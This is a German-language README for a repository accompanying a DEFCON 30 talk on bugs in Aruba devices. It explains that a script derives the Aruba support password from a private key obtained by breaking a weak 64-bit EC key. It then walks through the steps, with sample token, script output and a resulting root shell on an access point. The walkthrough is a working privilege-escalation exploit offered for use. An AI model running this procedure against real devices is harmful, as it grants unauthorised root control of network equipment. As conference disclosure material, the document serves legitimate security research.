
Begleitmaterial zum DEFCON-30-Vortrag „Hunting Bugs In The Tropics"
Dies ist ein Repository mit den Folien, die in meinem Vortrag "Jagd auf Bugs in den Tropen" auf der DEFCON30 verwendet wurden. Es enthält das Python-Skript zur Berechnung des Support-Passworts auf Basis des privaten Schlüssels, der durch das Brechen des EC-öffentlichen Schlüssels des Aruba-Supports aufgrund seiner schwachen Größe (64 Bit) erlangt wurde. Damit kannst du aus der Subshell auf diesen Geräten ausbrechen und eine vollständige Root-Shell erhalten.
Du kannst es verwenden, indem du support auf der AP-CLI ausführst und einen beliebigen Benutzernamen angibst:
# support
Username (Please enter with @domain.com, in lowercase): a
Token: ED14-B132-D4BB-D428
Please generate one time password at https://ase.arubanetworks.com/decode_aos_key
Support Password:
Übergib dann den Benutzernamen und den Token-Wert an das Skript support-access.py in diesem Repository.
$ ./support-access.py a ED14-B132-D4BB-D428
Password: 4197d68283f73d5c
Füge die Antwort als Support-Passwort ein:
Support Password: 4197d68283f73d5c
Switching to Full Access
~ # whoami
root